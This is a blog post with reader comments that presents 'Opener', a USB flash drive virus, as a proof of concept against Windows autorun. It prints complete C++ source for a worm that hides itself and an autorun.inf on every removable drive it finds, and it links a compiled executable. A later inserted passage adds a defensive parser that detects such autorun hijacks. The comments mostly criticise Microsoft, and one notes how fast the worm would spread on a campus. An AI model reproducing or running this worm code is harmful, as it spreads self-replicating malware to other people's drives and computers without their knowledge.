Opener: A USB Flash Drive Virus

For a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but also a security risk. Pretty much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk, and you can always rely on Microsoft to make the potential an actual. Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove, should it? Fair enough, here's some code:
```cpp
#include <windows.h>
#include <tchar.h>
#include <stdlib.h>
#include <string.h>

// autorun.inf dropped on each drive: makes "eject" the default verb and points
// its command at the copied executable, so double-clicking the drive in
// My Computer runs opener.exe instead of simply opening the folder.
#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"

HANDLE hmutex = NULL;

// Registered with atexit(): release the single-instance mutex on the way out.
void closing()
{
    if (hmutex)
        ReleaseMutex(hmutex);
}

int APIENTRY _tWinMain(HINSTANCE hInstance,
                       HINSTANCE hPrevInstance,
                       LPTSTR lpCmdLine,
                       int nCmdShow)
{
    UNREFERENCED_PARAMETER(hPrevInstance);
    UNREFERENCED_PARAMETER(lpCmdLine);

    // Full path of this executable; only proceed for a plain "X:\..." path.
    WCHAR myfile[1024];
    GetModuleFileName(NULL, myfile, 1024);
    if (myfile[1] != L':')
        return 1;

    // Open an Explorer window for the drive we were started from, so the user
    // sees the folder they expected when they double-clicked the drive.
    WCHAR cmd[1024];
    wsprintf(cmd, L"explorer %c:\\", myfile[0]);
    STARTUPINFOW si;
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    PROCESS_INFORMATION po;
    memset(&po, 0, sizeof(po));
    CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po);

    // Single-instance check. CreateMutex returns NULL on failure (not
    // INVALID_HANDLE_VALUE) and reports ERROR_ALREADY_EXISTS when another
    // copy is already running.
    hmutex = CreateMutex(NULL, TRUE, L"Opener");
    if (hmutex == NULL)
        return 1;
    if (GetLastError() == ERROR_ALREADY_EXISTS) {
        CloseHandle(hmutex);
        return 1;
    }
    atexit(closing);

    // Read our own image into memory so it can be written to each new drive.
    // CreateFile returns INVALID_HANDLE_VALUE on failure (not NULL).
    HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hmyfile == INVALID_HANDLE_VALUE)
        return 1;
    DWORD szhigh = 0;
    DWORD szlow = GetFileSize(hmyfile, &szhigh);
    if (szhigh != 0) {               // refuse anything 4 GB or larger
        CloseHandle(hmyfile);
        return 1;
    }
    void *myfilemem = malloc(szlow); // szhigh is 0 here, so szlow is the whole size
    if (myfilemem == NULL) {
        CloseHandle(hmyfile);
        return 1;
    }
    DWORD nread;
    ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
    CloseHandle(hmyfile);

    // Main loop: once a minute, look for removable drives that already hold
    // some data but no autorun.inf, and drop a hidden autorun.inf plus a
    // hidden copy of this executable onto them.
    while (1) {
        DWORD mask = GetLogicalDrives();
        for (int i = 0; i < 26; i++)
            if (mask & (1 << i)) {
                WCHAR path[100];
                path[0] = L'A' + i;
                path[1] = L':';
                path[2] = L'\\';
                path[3] = 0;
                DWORD type = GetDriveType(path);
                if (type == DRIVE_REMOVABLE) {
                    DWORD spc, bps, nfc, tnc;
                    // GetDiskFreeSpace fails when no media is present;
                    // nfc < tnc means the volume has something on it.
                    if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
                        if (nfc < tnc) {
                            wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
                            if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
                                HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
                                if (h != INVALID_HANDLE_VALUE) {
                                    DWORD written;
                                    WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
                                    CloseHandle(h);
                                    wsprintf(path, L"%c:\\opener.exe", L'A' + i);
                                    h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
                                    if (h != INVALID_HANDLE_VALUE) {
                                        WriteFile(h, myfilemem, szlow, &written, NULL);
                                        CloseHandle(h);
                                    } else {
                                        // Could not copy the executable: remove the
                                        // autorun.inf so the drive is left as it was.
                                        wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
                                        DeleteFile(path);
                                    }
                                }
                            }
                        }
                    }
                }
            }
        Sleep(1000 * 60);
    }
    return 0;
}
```
download: opener.cpp and here's it compiled: opener.exe.
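The whole trick rests on four lines of autorun.inf, so the defender's first question is "what would a double-click on this drive actually launch?". The following is an added example, not code from the post: a small portable parser that reads an autorun.inf and reports whether its default action has been redirected to a program, either through the legacy open= key or through the shell=/shell\verb\command= pairing the post uses. The sample text is constructed to match the file opener writes; the function name autorun_hijack is my own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Constructed sample: the same four lines the post's program writes to a drive. */
static const char SAMPLE_INF[] =
    "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n";
static void lower(char *s) { for (; *s; s++) *s = (char)tolower((unsigned char)*s); }
/* Returns 1 when the [autorun] section makes the drive's default action run a
 * program: a legacy "open=<exe>" key, or "shell=<verb>" paired with a
 * "shell\<verb>\command=<exe>" key. The offending command line is copied to cmd. */
int autorun_hijack(const char *inf, char *cmd, size_t clen)
{
    char line[256], defverb[64] = "", cmdverb[64] = "", cmdval[256] = "", openval[256] = "";
    int in_autorun = 0; cmd[0] = 0;
    for (const char *p = inf; *p; ) {
        size_t full = strcspn(p, "\r\n"), n = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, n); line[n] = 0;            /* copy one line */
        p += full; p += strspn(p, "\r\n");          /* skip CRLF or LF terminator */
        if (line[0] == '[') {                       /* section header; INI names are case-insensitive */
            lower(line); in_autorun = strcmp(line, "[autorun]") == 0; continue;
        }
        char *eq = in_autorun ? strchr(line, '=') : NULL;
        if (!eq) continue;
        *eq = 0; lower(line);                       /* lower-case the key only; value stays as written */
        const char *key = line, *val = eq + 1;
        if (strcmp(key, "open") == 0) {
            snprintf(openval, sizeof openval, "%s", val);
        } else if (strcmp(key, "shell") == 0) {
            snprintf(defverb, sizeof defverb, "%s", val); lower(defverb);
        } else if (strncmp(key, "shell\\", 6) == 0) {
            const char *bs = strrchr(key, '\\');    /* shell\<verb>\command */
            if (bs > key + 6 && strcmp(bs + 1, "command") == 0) {
                snprintf(cmdverb, sizeof cmdverb, "%.*s", (int)(bs - key - 6), key + 6);
                snprintf(cmdval, sizeof cmdval, "%s", val);
            }
        }
    }
    if (openval[0]) { snprintf(cmd, clen, "%s", openval); return 1; }
    if (defverb[0] && cmdval[0] && strcmp(defverb, cmdverb) == 0) {
        snprintf(cmd, clen, "%s", cmdval); return 1;
    }
    return 0;
}
int main(void)
{
    char cmd[256];    /* stand-alone demo on the constructed sample */
    if (autorun_hijack(SAMPLE_INF, cmd, sizeof cmd)) printf("default action runs: %s\n", cmd);
    else puts("no default-action hijack found");
    return 0;
}
```

A shell=<verb> line whose verb has no matching command= entry is reported as clean, since Explorer then has nothing of its own to run; icon= and label= keys are ignored as harmless.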
How does it work? It's really quite simple:
So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change: it won't pop up now. You may have had this experience before; it's kinda random when Windows will and won't pop up that box. No matter, go to My Computer as you typically would and double click on the drive that has been found, as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again. And so the cycle continues. Dear Microsoft, please fix, thanks.

QuantumG

Locke says: Yet another glaring hole in Microsoft's logic which will most definitely be answered by a statement that the user should only ever be using Microsoft approved hardware and software that has never been touched since they approved it and shrink-wrapped it. So, if you aren't using their stuff and you get a virus, your warranty is void, and no soup for you.

Locke says: I've posted about this on my blog and linked and credited you. Let me know what you think of my site if you get a chance. Thanks, Locke

Linux says: Linux

Linux says: Disregard that, I suck cocks.

Linus says: I'm not sure who thinks he's funnier, linux or the guy posting as linux...
Impotence says: This would spread through a college or university like wildfire; half of the people I know at college have a flash drive with them at all times and are copying things onto other people's flash drives for them (study notes etc).

MatthewT says: Amazing concept, more people need to know of this. This guy thinks you should just disable autorun, but a link is all he says: http://features.engadget.com/2004/06/29/how-to-tuesday-disable-autorun-on-windows/

Patrick says: http://wiki.hak5.org/wiki//USB_Hacksaw

Bill says: Autorun should be disabled by default, like hiding filename suffixes.

Leo. says: Stop criticizing Windows. For the people who don't care about/understand this, Windows will remain the best option. For those who understand this... well, we already know that Windows is shit.

Par[A]doX says: Oh my god! This is the worst thing that can ever happen in the history of things happening! Nevermind the fact that this, Hacksaw, and USBDumper are all easily detected by most antivirus software on the market as being malicious and therefore incapable of being downloaded, let alone executed.

WhatIsQDOS? says: Nevermind that anyone who understands the code above can alter and recompile it, voiding antivirus signature detection. Nevermind that any single point of failure in 3rd party "bulletproof vest" security products gives the attacker full ownership of a target machine running any Microsoft operating system. Nevermind that millions of botnet zombie computers, all of them with Microsoft operating systems, are dutifully downloading their antivirus updates every day, in between spraying spam across the world and participating in DDOS attacks.

Imposter says: Oh, Windows. When will you learn?

Embryonic says: Ubuntu =P

Luke says: Ubuntu rocks, I agree with Embryonic :D

paperbeatsrock says: www.fatchicksinpartyhats.com would destroy that virus... and all of mankind!